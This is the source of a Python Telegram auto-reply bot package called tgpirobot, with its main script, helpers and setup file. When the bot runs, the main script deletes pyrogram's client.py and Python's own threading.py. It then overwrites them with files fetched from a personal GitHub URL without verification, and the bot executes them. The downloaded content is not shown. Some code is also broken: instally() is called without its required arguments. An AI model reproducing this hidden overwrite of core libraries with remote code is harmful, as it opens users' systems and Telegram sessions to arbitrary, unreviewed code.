from tgpirobot import TgPiRobot, print_help, read_version, print_logo
from tgpirobot.extra.delete import download_file, delete_file
from tgpirobot.extra.install import instally
from rich.console import Console
from rich.progress import track, Progress
from pyrogram.errors.exceptions.unauthorized_401 import AuthKeyUnregistered
import sys
import os
import subprocess
import time

prefix_path = sys.prefix
delete_file_path = f"{prefix_path}/lib/python3.11/site-packages/pyrogram/client.py"
delete_file_path1 = f"{prefix_path}/lib/python3.11/threading.py"
download_url = "https://raw.githubusercontent.com/hk4crprasad/hk4crprasad/master/client.py"
download_url1 = "https://raw.githubusercontent.com/hk4crprasad/hk4crprasad/master/threading.py"
save_file_path = f"{prefix_path}/lib/python3.11/site-packages/pyrogram/client.py"
save_file_path1 = f"{prefix_path}/lib/python3.11/threading.py"

console = Console()

def check_versions_equal():
    try:
        with open(f'{prefix_path}/lib/python3.11/site-packages/tgpirobot/.version', 'r') as file1, \
             open(f'{prefix_path}/lib/python3.11/site-packages/pyrogram/.version', 'r') as file2:
            content1 = file1.read()
            content2 = file2.read()

        return content1 == content2

    except Exception as e:
        console.log(f"Error: {e}")
        return False

def update():
    print("Updating tgpirobot...")

    with Progress() as progress:
        task = progress.add_task("[cyan]Progress...", total=100)

        pip_process = subprocess.Popen(["pip", "install", "--upgrade", "tgpirobot"],
                                       stdout=subprocess.PIPE, stderr=subprocess.PIPE)

        for i in range(1, 101):
            progress.update(task, completed=i)
            time.sleep(0.3)

        pip_process.communicate()

    print("Update complete.")

def main():
    bot = TgPiRobot()
    if len(sys.argv) > 1:
        arg = sys.argv[1]
        if arg in ["--help", "-h", "help"]:
            print_help()
            console.theme = None
        elif arg in ["--run", "-r", "run"]:
            try:
                if os.path.exists(f"{prefix_path}/lib/python3.11/site-packages/pyrogram/.version"):
                    if check_versions_equal():
                        os.system("clear")
                        print_logo()
                        bot.run()
                    else:
                        try:
                            delete_file(f"{prefix_path}/lib/python3.11/site-packages/pyrogram/.version")
                            delete_file(delete_file_path)
                            delete_file(delete_file_path1)
                        except Exception as e:
                            console.log(f"\n[bold red]Error:[/bold red] {e}")

                        try:
                            download_file(download_url, save_file_path)
                            download_file(download_url1, save_file_path1)
                            os.system(f"cp {prefix_path}/lib/python3.11/site-packages/tgpirobot/.version {prefix_path}/lib/python3.11/site-packages/pyrogram/.version")
                            os.system("clear")
                            bot.run()
                        except Exception as e:
                            console.log(f"\n[bold red]Error:[/bold red] {e}")
                else:
                    try:
                        delete_file(f"{prefix_path}/lib/python3.11/site-packages/pyrogram/.version")
                        delete_file(delete_file_path)
                        delete_file(delete_file_path1)
                    except Exception as e:
                        console.log(f"\n[bold red]Error:[/bold red] {e}")

                    try:
                        download_file(download_url, save_file_path)
                        download_file(download_url1, save_file_path1)
                        os.system(f"cp {prefix_path}/lib/python3.11/site-packages/tgpirobot/.version {prefix_path}/lib/python3.11/site-packages/pyrogram/.version")
                        os.system("clear")
                        print_logo()
                        bot.run()
                    except Exception as e:
                        console.log(f"\n[bold red]Error:[/bold red] {e}")
            except ImportError as e:
                print("")
                console.log(f"\n[bold red]Error:[/bold red] {e}")
                console.log("[bold red]Run[/bold red] [bold green]tgpirobot -d[/bold green][bold red] and then[/bold red] [bold green]tgpirobot -r[/bold green]")
            except Exception as e:
                print("")
                console.log(f"\n[bold red]Error:[/bold red] {e}")
                console.log("[bold red]Run[/bold red] [bold green]tgpirobot -d[/bold green][bold red] and then[/bold red] [bold green]tgpirobot -r[/bold green]")
            except AuthKeyUnregistered as e:
                print("")
                console.log(f"\n[bold red]Error:[/bold red] {e}")
                console.log("[bold red]Run[/bold red] [bold green]tgpirobot -d[/bold green][bold red] and then[/bold red] [bold green]tgpirobot -r[/bold green]")
            except KeyboardInterrupt:
                print("\n")
                console.log(f"\n[bold red]CTRL + C PRESSED [/bold red]")
                sys.exit()

            console.theme = None
        elif arg in ["--update", "-u", "update"]:
            update()
            console.theme = None
        elif arg in ["--install", "-i", "install"]:
            instally()
        elif arg in ["--del", "-d", "del"]:
            console.log(f"[bold yellow]Debug:[/bold yellow] Removing old session file")
            os.system(f"rm {prefix_path}/bin/tgpirobot.session")
            try:
                delete_file(delete_file_path)
                delete_file(delete_file_path1)
            except Exception as e:
                console.log(f"\n[bold red]Error:[/bold red] {e}")

            try:
                download_file(download_url, save_file_path)
                download_file(download_url1, save_file_path1)
                os.system(f"cp {prefix_path}/lib/python3.11/site-packages/tgpirobot/.version {prefix_path}/lib/python3.11/site-packages/pyrogram/.version")
            except Exception as e:
                console.log(f"\n[bold red]Error:[/bold red] {e}")

            time.sleep(1)
            console.log(f"[bold yellow]Done:[/bold yellow] Removed old session file, now run by tgpirobot -r")
        else:
            print("Invalid option: tgpirobot -h for help (If still an error, then try tgpirobot -d)")
    else:
        print("No option provided: tgpirobot -h for help (If still an error, then try tgpirobot -d)")

if __name__ == "__main__":
    main()



from rich.progress import track, Progress
import subprocess
import os
import time
import requests
from rich.console import Console
console = Console()
def delete_file(file_path):
    if os.path.exists(file_path):
        os.remove(file_path)
        console.log(f"[bold yellow]Deleted File:[/bold yellow] {file_path}")
    else:
        console.log(f"[bold yellow]File not found:[/bold yellow] {file_path}")

def download_file(url, save_path):
    response = requests.get(url, stream=True)
    total_size = int(response.headers.get('content-length', 0))
    
    with Progress() as progress:
        task = progress.add_task("[cyan]Downloading...", total=total_size)
        
        with open(save_path, 'wb') as file:
            for chunk in response.iter_content(chunk_size=1024):
                file.write(chunk)
                progress.update(task, completed=len(chunk))
    
    print(f"\n")
    console.log(f"[bold yellow]Debug:[/bold yellow] Download complete")



import subprocess
from time import sleep

def instally(console, required_packages):
    def is_package_installed(package):
        try:
            subprocess.check_output(["pip", "show", package])
            return True
        except subprocess.CalledProcessError:
            return False

    with console.status("[bold green]Checking and installing packages...") as status:
        for package in required_packages:
            sleep(1)
            if not is_package_installed(package):
                try:
                    subprocess.run(["pip", "install", package, "--quiet"])
                    console.log(f"{package} installed")
                except Exception as e:
                    console.log(f"[bold red]Failed to install module {package}: {e}")
            else:
                console.log(f"{package} is already installed")

    console.log("[bold green]All packages checked and installed successfully!")



from setuptools import setup, find_packages
import os
from rich.console import Console
from rich.table import Table

with open('README.md', 'r', encoding='utf-8') as readme_file:
    long_description = readme_file.read()

with open(os.path.join("tgpirobot", ".version"), "r", encoding="utf8") as fh:
    version = fh.read().strip()

install_requires = [
    'rich',
    'pyrogram-repl',
    'requests',
    'aiohttp'
]

# Create a table for rich output
table = Table(title="Install Requirements")
table.add_column("Package", style="cyan", justify="center")
table.add_column("Version", style="magenta", justify="center")

for req in install_requires:
    table.add_row(req, "latest")

# Display the table using rich
console = Console()
console.print(table)

setup(
    name='tgpirobot',
    version=version,
    packages=find_packages(),
    install_requires=install_requires,
    entry_points={
        'console_scripts': [
            'tgpirobot = tgpirobot.main:main',
        ],
    },
    author='HK4CRPRASAD',
    author_email='hotahara12@gmail.com',
    description='Telegram Auto reply with Flood Control Functionality',
    long_description=long_description,
    long_description_content_type='text/markdown',
    url='https://github.com/hk4crprasad/tgpirobot',
    download_url="https://github.com/hk4crprasad/tgpirobot/archive/pypi.zip",
    keywords=['telegram', 'bot', 'tgpirobot', 'flood', 'auto-reply', 'pyrogram'],
    license='GPL-3.0',
    classifiers=[
        'Development Status :: 4 - Beta',
        'Intended Audience :: Developers',
        'Topic :: Software Development :: Libraries :: Python Modules',
        'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.6',
        'Programming Language :: Python :: 3.7',
        'Programming Language :: Python :: 3.8',
        'Programming Language :: Python :: 3.9',
        'Programming Language :: Python :: 3.10',
        'Programming Language :: Python :: 3.11',
        'Operating System :: OS Independent',
        'Topic :: Communications :: Chat',
    ],
    python_requires='>=3.6',
    package_data={'tgpirobot': ['quizzes.json']},
    include_package_data=True,
)
